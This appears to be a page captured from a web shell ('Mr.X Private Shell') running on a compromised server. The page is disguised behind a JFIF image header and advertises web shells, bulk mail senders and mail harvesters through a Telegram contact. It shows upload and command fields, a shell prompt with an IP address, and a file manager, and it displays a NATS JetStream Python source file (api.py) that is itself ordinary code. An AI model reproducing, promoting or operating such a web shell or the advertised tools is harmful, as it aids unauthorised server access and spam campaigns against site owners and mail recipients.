����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# Copyright 2021 The NATS Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from __future__ import annotations

import datetime
from dataclasses import dataclass, fields, replace
from enum import Enum
from typing import Any, Dict, Iterable, Iterator, List, Optional, TypeVar

_NANOSECOND = 10**9


class Header(str, Enum):
    CONSUMER_STALLED = "Nats-Consumer-Stalled"
    DESCRIPTION = "Description"
    EXPECTED_LAST_MSG_ID = "Nats-Expected-Last-Msg-Id"
    EXPECTED_LAST_SEQUENCE = "Nats-Expected-Last-Sequence"
    EXPECTED_LAST_SUBJECT_SEQUENCE = "Nats-Expected-Last-Subject-Sequence"
    EXPECTED_STREAM = "Nats-Expected-Stream"
    LAST_CONSUMER = "Nats-Last-Consumer"
    LAST_STREAM = "Nats-Last-Stream"
    MSG_ID = "Nats-Msg-Id"
    MSG_TTL = "Nats-TTL"
    ROLLUP = "Nats-Rollup"
    STATUS = "Status"


DEFAULT_PREFIX = "$JS.API"
INBOX_PREFIX = b"_INBOX."


class StatusCode(str, Enum):
    SERVICE_UNAVAILABLE = "503"
    NO_MESSAGES = "404"
    REQUEST_TIMEOUT = "408"
    CONFLICT = "409"
    CONTROL_MESSAGE = "100"


_B = TypeVar("_B", bound="Base")


@dataclass
class Base:
    """
    Helper dataclass to filter unknown fields from the API.
    """

    @staticmethod
    def _convert(resp: Dict[str, Any], field: str, type: type[Base]) -> None:
        """Convert the field into the given type in place."""
        data = resp.get(field, None)
        if data is None:
            resp[field] = None
        elif isinstance(data, list):
            resp[field] = [type.from_response(item) for item in data]
        else:
            resp[field] = type.from_response(data)

    @staticmethod
    def _convert_nanoseconds(resp: Dict[str, Any], field: str) -> None:
        """Convert the given field from nanoseconds to seconds in place."""
        val = resp.get(field, None)
        if val is not None:
            val = val / _NANOSECOND
        resp[field] = val

    @staticmethod
    def _to_nanoseconds(val: Optional[float]) -> Optional[int]:
        """Convert the value from seconds to nanoseconds."""
        if val is None:
            # We use 0 to avoid sending null to Go servers.
            return 0
        return int(val * _NANOSECOND)

    @staticmethod
    def _convert_utc_iso(resp: Dict[str, Any], field: str) -> None:
        """Convert a ISO 8601/RFC 3339 string field into a datetime in place."""
        val = resp.get(field, None)
        if val is not None:
            resp[field] = Base._parse_utc_iso(val)

    @staticmethod
    def _to_utc_iso(date: datetime.datetime) -> str:
        """Convert a datetime into an ISO 8601/RFC 3339 formatted string.

        If datetime does not have timezone information, datetime
        is assumed to be in UTC timezone. Strings are passed through as-is
        for backwards compatibility.
        """
        if isinstance(date, str):
            return date
        if date.tzinfo is None:
            date = date.replace(tzinfo=datetime.timezone.utc)
        elif date.tzinfo != datetime.timezone.utc:
            date = date.astimezone(datetime.timezone.utc)
        return date.isoformat().replace("+00:00", "Z").replace(".000000", "")

    @staticmethod
    def _parse_utc_iso(time_string: str) -> datetime.datetime:
        """Parse an ISO 8601 timestamp (with nanoseconds) into a UTC datetime."""
        # Replace Z with UTC offset
        s = time_string.replace("Z", "+00:00")
        # Trim fractional seconds to 6 digits (microsecond precision)
        date_part, frac_tz = s.split(".", 1)
        frac, tz = frac_tz.split("+")
        frac = frac[:6]  # keep only microseconds
        s = f"{date_part}.{frac}+{tz}"
        return datetime.datetime.fromisoformat(s).astimezone(datetime.timezone.utc)

    @classmethod
    def from_response(cls: type[_B], resp: Dict[str, Any]) -> _B:
        """Read the class instance from a server response.

        Unknown fields are ignored ("open-world assumption").
        """
        params = {}
        for field in fields(cls):
            if field.name in resp:
                params[field.name] = resp[field.name]
        return cls(**params)

    def evolve(self: _B, **params) -> _B:
        """Return a copy of the instance with the passed values replaced."""
        return replace(self, **params)

    def as_dict(self) -> Dict[str, object]:
        """Return the object converted into an API-friendly dict."""
        result = {}
        for field in fields(self):
            val = getattr(self, field.name)
            if val is None:
                continue
            if isinstance(val, Base):
                val = val.as_dict()
            if isinstance(val, list):
                if len(val) > 0 and isinstance(val[0], Base):
                    val = [v.as_dict() for v in val if isinstance(v, Base)]
            result[field.name] = val
        return result


@dataclass
class PubAck(Base):
    """
    PubAck is the response of publishing a message to JetStream.
    """

    stream: str
    seq: int
    domain: Optional[str] = None
    duplicate: Optional[bool] = None


@dataclass
class Placement(Base):
    """Placement directives to consider when placing replicas of this stream"""

    cluster: Optional[str] = None
    tags: Optional[List[str]] = None


@dataclass
class ExternalStream(Base):
    api: str
    deliver: Optional[str] = None

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        return result


@dataclass
class StreamSource(Base):
    name: str
    opt_start_seq: Optional[int] = None
    opt_start_time: Optional[datetime.datetime] = None
    filter_subject: Optional[str] = None
    external: Optional[ExternalStream] = None
    subject_transforms: Optional[List[SubjectTransform]] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "external", ExternalStream)
        cls._convert(resp, "subject_transforms", SubjectTransform)
        cls._convert_utc_iso(resp, "opt_start_time")
        return super().from_response(resp)

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        if self.subject_transforms:
            result["subject_transforms"] = [tr.as_dict() for tr in self.subject_transforms]
        if self.opt_start_time is not None:
            result["opt_start_time"] = self._to_utc_iso(self.opt_start_time)
        return result


@dataclass
class StreamSourceInfo(Base):
    name: str
    lag: Optional[int] = None
    active: Optional[int] = None
    error: Optional[Dict[str, Any]] = None


@dataclass
class LostStreamData(Base):
    msgs: Optional[List[int]] = None
    bytes: Optional[int] = None


@dataclass
class StreamState(Base):
    messages: int
    bytes: int
    first_seq: int
    last_seq: int
    consumer_count: int
    deleted: Optional[List[int]] = None
    num_deleted: Optional[int] = None
    lost: Optional[LostStreamData] = None
    subjects: Optional[Dict[str, int]] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "lost", LostStreamData)
        return super().from_response(resp)


class RetentionPolicy(str, Enum):
    """How message retention is considered"""

    LIMITS = "limits"
    INTEREST = "interest"
    WORK_QUEUE = "workqueue"


class StorageType(str, Enum):
    """The type of storage backend"""

    FILE = "file"
    MEMORY = "memory"


class DiscardPolicy(str, Enum):
    """Discard policy when a stream reaches its limits"""

    OLD = "old"
    NEW = "new"


class StoreCompression(str, Enum):
    """
    If stream is file-based and a compression algorithm is specified,
    the stream data will be compressed on disk.

    Valid options are none or s2 for Snappy compression.
    Introduced in nats-server 2.10.0.
    """

    NONE = "none"
    S2 = "s2"


class PersistMode(str, Enum):
    """
    PersistMode defines the consistency and durability guarantees for stream persistence.

    See ADR-56 for details: https://github.com/nats-io/nats-architecture-and-design/blob/main/adr/ADR-56.md

    Currently only applicable to R1 (single replica) streams.
    Introduced in nats-server 2.12.0.
    """

    # DEFAULT represents the strongest consistency guarantee.
    # Uses synchronous writes with fsync for maximum durability.
    # Server does not store this value - it's the implied default when unset.
    DEFAULT = "default"

    # ASYNC enables asynchronous flushing of data to disk.
    # Returns PubAck before disk persistence occurs, batching writes in memory.
    # Provides significantly improved performance at the cost of potential data loss
    # during infrastructure failures. Incompatible with batch publishing.
    ASYNC = "async"


@dataclass
class RePublish(Base):
    """
    RePublish is for republishing messages once committed to a stream. The original
    subject cis remapped from the subject pattern to the destination pattern.
    """

    src: Optional[str] = None
    dest: Optional[str] = None
    headers_only: Optional[bool] = None


@dataclass
class SubjectTransform(Base):
    """Subject transform to apply to matching messages."""

    src: str
    dest: str

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        return result


@dataclass
class StreamConfig(Base):
    """
    StreamConfig represents the configuration of a stream.
    """

    name: Optional[str] = None
    description: Optional[str] = None
    subjects: Optional[List[str]] = None
    retention: Optional[RetentionPolicy] = None
    max_consumers: Optional[int] = None
    max_msgs: Optional[int] = None
    max_bytes: Optional[int] = None
    discard: Optional[DiscardPolicy] = DiscardPolicy.OLD
    discard_new_per_subject: bool = False
    max_age: Optional[float] = None  # in seconds
    max_msgs_per_subject: int = -1
    max_msg_size: Optional[int] = -1
    storage: Optional[StorageType] = None
    num_replicas: Optional[int] = None
    no_ack: bool = False
    template_owner: Optional[str] = None
    duplicate_window: float = 0
    placement: Optional[Placement] = None
    mirror: Optional[StreamSource] = None
    sources: Optional[List[StreamSource]] = None
    sealed: bool = False
    deny_delete: bool = False
    deny_purge: bool = False
    allow_rollup_hdrs: bool = False

    # Allow republish of the message after being sequenced and stored.
    republish: Optional[RePublish] = None
    subject_transform: Optional[SubjectTransform] = None

    # Allow higher performance, direct access to get individual messages. E.g. KeyValue
    allow_direct: Optional[bool] = None

    # Allow higher performance and unified direct access for mirrors as well.
    mirror_direct: Optional[bool] = None

    # Allow compressing messages.
    compression: Optional[StoreCompression] = None

    # Allow per-message TTL via Nats-TTL header. Introduced in nats-server 2.11.0.
    allow_msg_ttl: Optional[bool] = None

    # Allow scheduled/delayed messages. Introduced in nats-server 2.12.0.
    allow_msg_schedules: Optional[bool] = None

    # Allow atomic batch publishing. Introduced in nats-server 2.12.0.
    allow_atomic: Optional[bool] = None

    # Allow batched publishing. Introduced in nats-server 2.12.0.
    allow_batched: Optional[bool] = None

    # Persistence mode for stream. Only applicable to R1 streams.
    # Introduced in nats-server 2.12.0.
    persist_mode: Optional[PersistMode] = None

    # Metadata are user defined string key/value pairs.
    metadata: Optional[Dict[str, str]] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert_nanoseconds(resp, "max_age")
        cls._convert_nanoseconds(resp, "duplicate_window")
        cls._convert(resp, "placement", Placement)
        cls._convert(resp, "mirror", StreamSource)
        cls._convert(resp, "sources", StreamSource)
        cls._convert(resp, "republish", RePublish)
        cls._convert(resp, "subject_transform", SubjectTransform)
        return super().from_response(resp)

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        result["duplicate_window"] = self._to_nanoseconds(self.duplicate_window)
        result["max_age"] = self._to_nanoseconds(self.max_age)
        if self.sources:
            result["sources"] = [src.as_dict() for src in self.sources]
        if self.compression and (self.compression != StoreCompression.NONE and self.compression != StoreCompression.S2):
            raise ValueError("nats: invalid store compression type: %s" % self.compression)
        if self.metadata and not isinstance(self.metadata, dict):
            raise ValueError("nats: invalid metadata format")
        return result


@dataclass
class PeerInfo(Base):
    name: Optional[str] = None
    current: Optional[bool] = None
    offline: Optional[bool] = None
    active: Optional[int] = None
    lag: Optional[int] = None


@dataclass
class ClusterInfo(Base):
    leader: Optional[str] = None
    name: Optional[str] = None
    replicas: Optional[List[PeerInfo]] = None
    raft_group: Optional[str] = None
    leader_since: Optional[datetime.datetime] = None
    traffic_acc: Optional[str] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "replicas", PeerInfo)
        if "leader_since" in resp and resp["leader_since"]:
            resp["leader_since"] = cls._parse_utc_iso(resp["leader_since"])
        return super().from_response(resp)


@dataclass
class StreamInfo(Base):
    """
    StreamInfo is the latest information about a stream from JetStream.
    """

    config: StreamConfig
    state: StreamState
    mirror: Optional[StreamSourceInfo] = None
    sources: Optional[List[StreamSourceInfo]] = None
    cluster: Optional[ClusterInfo] = None
    did_create: Optional[bool] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "config", StreamConfig)
        cls._convert(resp, "state", StreamState)
        cls._convert(resp, "mirror", StreamSourceInfo)
        cls._convert(resp, "sources", StreamSourceInfo)
        cls._convert(resp, "cluster", ClusterInfo)
        return super().from_response(resp)


@dataclass
class StreamsListIterator(Iterable):
    """
    StreamsListIterator is an iterator for streams list responses from JetStream.
    """

    def __init__(self, offset: int, total: int, streams: List[Dict[str, any]]) -> None:
        self.offset = offset
        self.total = total
        self.streams = streams
        self._index = 0

    def __iter__(self) -> Iterator[StreamInfo]:
        return self

    def __next__(self) -> StreamInfo:
        if self._index < len(self.streams):
            stream_info = StreamInfo.from_response(self.streams[self._index])
            self._index += 1
            return stream_info
        else:
            raise StopIteration


class AckPolicy(str, Enum):
    """Policies defining how messages should be acknowledged.

    If an ack is required but is not received within the AckWait window, the message will be redelivered.

    References:
        * `Consumers, AckPolicy <https://docs.nats.io/jetstream/concepts/consumers#ackpolicy>`_
    """

    NONE = "none"
    ALL = "all"
    EXPLICIT = "explicit"


class DeliverPolicy(str, Enum):
    """When a consumer is first created, it can specify where in the stream it wants to start receiving messages.

    This is the DeliverPolicy, and this enumeration defines allowed values.

    References:
        * `Consumers, DeliverPolicy/OptStartSeq/OptStartTime <https://docs.nats.io/jetstream/concepts/consumers#deliverpolicy-optstartseq-optstarttime>`_
    """  # noqa: E501

    ALL = "all"
    LAST = "last"
    NEW = "new"
    BY_START_SEQUENCE = "by_start_sequence"
    BY_START_TIME = "by_start_time"
    LAST_PER_SUBJECT = "last_per_subject"


class ReplayPolicy(str, Enum):
    """The replay policy applies when the DeliverPolicy is one of:
        * all
        * by_start_sequence
        * by_start_time
    since those deliver policies begin reading the stream at a position other than the end.

    References:
        * `Consumers, ReplayPolicy <https://docs.nats.io/jetstream/concepts/consumers#replaypolicy>`_
    """

    INSTANT = "instant"
    ORIGINAL = "original"


@dataclass
class ConsumerConfig(Base):
    """Consumer configuration.

    References:
        * `Consumers <https://docs.nats.io/jetstream/concepts/consumers>`_
    """

    name: Optional[str] = None
    durable_name: Optional[str] = None
    description: Optional[str] = None
    deliver_policy: Optional[DeliverPolicy] = DeliverPolicy.ALL
    opt_start_seq: Optional[int] = None
    opt_start_time: Optional[datetime.datetime] = None
    ack_policy: Optional[AckPolicy] = AckPolicy.EXPLICIT
    ack_wait: Optional[float] = None  # in seconds
    max_deliver: Optional[int] = None
    backoff: Optional[List[float]] = None  # in seconds, overrides ack_wait
    filter_subject: Optional[str] = None
    filter_subjects: Optional[List[str]] = None
    replay_policy: Optional[ReplayPolicy] = ReplayPolicy.INSTANT
    rate_limit_bps: Optional[int] = None
    sample_freq: Optional[str] = None
    max_waiting: Optional[int] = None
    max_ack_pending: Optional[int] = None
    flow_control: Optional[bool] = None
    idle_heartbeat: Optional[float] = None
    headers_only: Optional[bool] = None

    # Push based consumers.
    deliver_subject: Optional[str] = None
    # Push based queue consumers.
    deliver_group: Optional[str] = None

    # Ephemeral inactivity threshold
    inactive_threshold: Optional[float] = None  # in seconds

    # Generally inherited by parent stream and other markers, now can
    # be configured directly.
    num_replicas: Optional[int] = None

    # Force memory storage.
    mem_storage: Optional[bool] = None

    # Metadata are user defined string key/value pairs.
    metadata: Optional[Dict[str, str]] = None

    # Consumer pause until timestamp.
    # Temporarily suspend message delivery until the specified time (RFC 3339 format).
    # Introduced in nats-server 2.11.0.
    pause_until: Optional[str] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert_nanoseconds(resp, "ack_wait")
        cls._convert_nanoseconds(resp, "idle_heartbeat")
        cls._convert_nanoseconds(resp, "inactive_threshold")
        cls._convert_utc_iso(resp, "opt_start_time")
        if "backoff" in resp:
            resp["backoff"] = [val / _NANOSECOND for val in resp["backoff"]]
        return super().from_response(resp)

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        if self.opt_start_time is not None:
            result["opt_start_time"] = self._to_utc_iso(self.opt_start_time)
        result["ack_wait"] = self._to_nanoseconds(self.ack_wait)
        result["idle_heartbeat"] = self._to_nanoseconds(self.idle_heartbeat)
        result["inactive_threshold"] = self._to_nanoseconds(self.inactive_threshold)
        if self.backoff:
            result["backoff"] = [self._to_nanoseconds(i) for i in self.backoff]
        return result


@dataclass
class SequenceInfo(Base):
    consumer_seq: int
    stream_seq: int
    last_active: Optional[datetime.datetime] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert_utc_iso(resp, "last_active")
        return super().from_response(resp)

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        if self.last_active is not None:
            result["last_active"] = self._to_utc_iso(self.last_active)
        return result


@dataclass
class ConsumerInfo(Base):
    """
    ConsumerInfo represents the info about the consumer.
    """

    name: str
    stream_name: str
    config: ConsumerConfig
    created: datetime.datetime
    delivered: Optional[SequenceInfo] = None
    ack_floor: Optional[SequenceInfo] = None
    num_ack_pending: Optional[int] = None
    num_redelivered: Optional[int] = None
    num_waiting: Optional[int] = None
    num_pending: Optional[int] = None
    cluster: Optional[ClusterInfo] = None
    push_bound: Optional[bool] = None
    # Indicates if the consumer is currently paused.
    # Introduced in nats-server 2.11.0.
    paused: Optional[bool] = None
    # RFC 3339 timestamp until which the consumer is paused.
    # Introduced in nats-server 2.11.0.
    pause_remaining: Optional[str] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "delivered", SequenceInfo)
        cls._convert(resp, "ack_floor", SequenceInfo)
        cls._convert(resp, "config", ConsumerConfig)
        cls._convert(resp, "cluster", ClusterInfo)
        cls._convert_utc_iso(resp, "created")
        return super().from_response(resp)

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        result["created"] = self._to_utc_iso(self.created)
        return result


@dataclass
class ConsumerPause(Base):
    """
    ConsumerPause represents the pause state after a pause or resume operation.
    Introduced in nats-server 2.11.0.
    """

    paused: bool
    pause_until: Optional[str] = None
    pause_remaining: Optional[str] = None


@dataclass
class AccountLimits(Base):
    """Account limits

    References:
        * `Multi-tenancy & Resource Mgmt <https://docs.nats.io/jetstream/resource_management>`_
    """

    max_memory: int
    max_storage: int
    max_streams: int
    max_consumers: int
    max_ack_pending: int
    memory_max_stream_bytes: int
    storage_max_stream_bytes: int
    max_bytes_required: bool


@dataclass
class Tier(Base):
    memory: int
    storage: int
    streams: int
    consumers: int
    limits: AccountLimits

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "limits", AccountLimits)
        return super().from_response(resp)


@dataclass
class APIStats(Base):
    """API stats"""

    total: int
    errors: int


@dataclass
class AccountInfo(Base):
    """Account information

    References:
        * `Account Information <https://docs.nats.io/jetstream/administration/account#account-information>`_
    """

    # NOTE: These fields are shared with Tier type as well.
    memory: int
    storage: int
    streams: int
    consumers: int
    limits: AccountLimits

    api: APIStats
    domain: Optional[str] = None
    tiers: Optional[Dict[str, Tier]] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "limits", AccountLimits)
        cls._convert(resp, "api", APIStats)
        info = super().from_response(resp)
        tiers = resp.get("tiers", None)
        if tiers:
            result = {}
            for k, v in tiers.items():
                result[k] = Tier.from_response(v)
            info.tiers = result
        return info


@dataclass
class RawStreamMsg(Base):
    subject: Optional[str] = None
    seq: Optional[int] = None
    data: Optional[bytes] = None
    hdrs: Optional[bytes] = None
    headers: Optional[Dict] = None
    stream: Optional[str] = None
    time: Optional[datetime.datetime] = None

    @property
    def sequence(self) -> Optional[int]:
        return self.seq

    @property
    def header(self) -> Optional[Dict]:
        """
        header returns the headers from a message.
        """
        return self.headers

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        resp["time"] = cls._parse_utc_iso(resp["time"])
        return super().from_response(resp)


@dataclass
class KeyValueConfig(Base):
    """
    KeyValueConfig is the configuration of a KeyValue store.
    """

    bucket: str
    description: Optional[str] = None
    max_value_size: Optional[int] = None
    history: int = 1
    ttl: Optional[float] = None  # in seconds
    max_bytes: Optional[int] = None
    storage: Optional[StorageType] = None
    replicas: int = 1
    placement: Optional[Placement] = None
    republish: Optional[RePublish] = None
    direct: Optional[bool] = None

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        result["ttl"] = self._to_nanoseconds(self.ttl)
        return result


@dataclass
class StreamPurgeRequest(Base):
    """
    StreamPurgeRequest is optional request information to the purge API.
    """

    # Purge up to but not including sequence.
    seq: Optional[int] = None
    # Subject to match against messages for the purge command.
    filter: Optional[str] = None
    # Number of messages to keep.
    keep: Optional[int] = None


@dataclass
class ObjectStoreConfig(Base):
    """
    ObjectStoreConfig is the configurigation of an ObjectStore.
    """

    bucket: Optional[str] = None
    description: Optional[str] = None
    ttl: Optional[float] = None
    max_bytes: Optional[int] = None
    storage: Optional[StorageType] = None
    replicas: int = 1
    placement: Optional[Placement] = None

    def as_dict(self) -> Dict[str, object]:
        result = super().as_dict()
        result["ttl"] = self._to_nanoseconds(self.ttl)
        return result


@dataclass
class ObjectLink(Base):
    """
    ObjectLink is used to embed links to other buckets and objects.
    """

    # Bucket is the name of the other object store.
    bucket: str
    #  Name can be used to link to a single object.
    # If empty means this is a link to the whole store, like a directory.
    name: Optional[str] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        return super().from_response(resp)


@dataclass
class ObjectMetaOptions(Base):
    link: Optional[ObjectLink] = None
    max_chunk_size: Optional[int] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "link", ObjectLink)
        return super().from_response(resp)


@dataclass
class ObjectMeta(Base):
    """
    ObjectMeta is high level information about an object.
    """

    name: Optional[str] = None
    description: Optional[str] = None
    headers: Optional[dict] = None
    #  Optional options.
    options: Optional[ObjectMetaOptions] = None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "options", ObjectMetaOptions)
        return super().from_response(resp)


@dataclass
class ObjectInfo(Base):
    """
    ObjectInfo is meta plus instance information.
    """

    name: str
    bucket: str
    nuid: str
    size: Optional[int] = None
    mtime: Optional[str] = None
    chunks: Optional[int] = None
    digest: Optional[str] = None
    deleted: Optional[bool] = False
    description: Optional[str] = None
    headers: Optional[dict] = None
    #  Optional options.
    options: Optional[ObjectMetaOptions] = None
    # NOTE: name, description, headers, options together compose
    # what would be the ObjectMeta embedded type in Go.

    @property
    def meta(self) -> ObjectMeta:
        return ObjectMeta(
            name=self.name,
            description=self.description,
            headers=self.headers,
            options=self.options,
        )

    def is_link(self) -> bool:
        return self.options is not None and self.options.link is not None

    @classmethod
    def from_response(cls, resp: Dict[str, Any]):
        cls._convert(resp, "options", ObjectMetaOptions)
        return super().from_response(resp)

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 765 B 0644
api.py File 27.24 KB 0644
client.py File 53.2 KB 0644
errors.py File 7.36 KB 0644
kv.py File 17.86 KB 0644
manager.py File 14.8 KB 0644
object_store.py File 17.04 KB 0644